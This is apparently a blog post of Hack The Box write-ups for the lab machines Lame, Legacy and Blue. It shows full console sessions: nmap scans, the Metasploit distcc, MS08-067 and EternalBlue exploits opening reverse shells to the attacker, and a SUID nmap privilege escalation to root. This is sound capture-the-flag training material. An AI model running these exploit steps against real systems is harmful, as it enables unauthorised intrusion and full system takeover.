j4ckdaw@site:~$

Posts

Archive

About

HTB Writeups - LAME, LEGACY, BLUE

A 3-for-1!

These three machines were too short or easy to really warrant a full writeup by themselves, so I’ve compounded them into this post. Let’s get started!

LAME

The most obvious way to complete this box seems to be with an SMB exploit, but I initially went a different way that I’ll go through here.

We start with a more exhaustive nmap scan to find open ports:

root@kali:~# nmap -sV -p1-65535 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 10.10.10.3
Host is up (0.080s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

And now another scan, concentrating on those open ports, to get detailed version information:

root@kali:~# nmap -sV --version-light -p21,22,139,445,3632 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) 
Nmap scan report for 10.10.10.3
Host is up (0.049s latency).
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

distccd is a service that allows for distributed compilation over several machines - but versions before 2.16 have a remote code execution vulnerability. There’s a metasploit module we can use to take advantage of this. We’ll start msfconsole:

msf5 > use exploit/unix/misc/distcc_exec 
msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > set RPORT 3632
RPORT => 3632
msf5 exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP double handler on 10.10.14.51:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo o9TguQKChBhEyHVo;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "o9TguQKChBhEyHVo\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.51:4444 -> 10.10.10.3:58496)

Now we have a basic shell on the remote machine, we can gather some information and grab the user flag.

$ whoami & hostname & pwd
daemon
lame
/tmp
$ cd /home/ && ls
ftp
makis
service
user
$ ls makis
user.txt
$ cat makis/user.txt

We don’t yet have access to /root/, however, so we need to escalate our privileges.

Let’s check which programs have the ability to set our UID to the owner’s, with the following command:

find / -perm -u=s -type f 2>/dev/null

/ says to search everything in the root directory,

-perm -u=s specifies that we should only match files that have SUID permissions,

-type f will match just regular files, and

2>/dev/null directs all stderr (like files that aren’t matches) to /dev/null, discarding it. Here’s the output:

/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown

Most of the programs here are builtins, and thus unlikely to be easy targets - but nmap isn’t.

Who is the owner, and are we able to execute it?

$ ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap

What version is it?

$ nmap --version
Nmap version 4.53 ( http://insecure.org )

As it turns out, old versions of nmap allowed users to execute commands via an interactive mode. We can use this mode to spawn a shell with the same privileges as the owner of the program, in this case root.

$ nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
$ whoami
root
$ cat /root/root.txt

LEGACY

As usual, we start with an nmap scan:

root@kali:~# nmap -sV 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 10.10.10.4
Host is up (0.087s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

It’s fairly clear that we’re going to be exploiting SMB. We can use a metasploit module to get detailed information about the host:

msf5 > use auxiliary/scanner/smb/smb_version 
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 auxiliary(scanner/smb/smb_version) > run

[+] 10.10.10.4:445        - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB )
[*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Now we know the machine is running XP SP3, we can narrow down the list of suitable exploits to use against the service:

msf5 auxiliary(scanner/smb/smb_version) > search path:exploit/windows/smb sp3

Having chosen one, configure the parameters and execute:

msf5 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.51:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.51:4444 -> 10.10.10.4:1032) at 2019-09-01 11:13:54 -0400
meterpreter >

We have a meterpreter shell!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\WINDOWS\system32

The exploit spawned our shell with SYSTEM privileges, so we’re done here.

meterpreter > cat /Documents\ and\ Settings/Administrator/Desktop/root.txt
meterpreter > cat /Documents\ and\ Settings/john/Desktop/user.txt

BLUE

You know the drill - nmap time:

root@kali:~# nmap -sV 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 10.10.10.40
Host is up (0.20s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

And… it’s another SMB exploit.

This time, we know the box is running at least Windows 7, so the previous exploit won’t do. However, this box is vulnerable to the infamous EternalBlue exploit, used in the WannaCry ransomware attack. There are a few metasploit modules for this, so let’s start up msfconsole and get this writeup over with :)

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.14.51:4444
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.51:4444 -> 10.10.10.40:49159) at 2019-09-01 11:57:44 -0400
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32> whoami
nt authority\system

Finally, let’s get the user and root flags.

C:\Windows\System32> more \Users\Administrator\Desktop\root.txt
C:\Windows\System32> more \Users\haris\Desktop\user.txt

That’s all three rooted! Thanks for reading, some more interesting ones coming soon…

  • j4ckdaw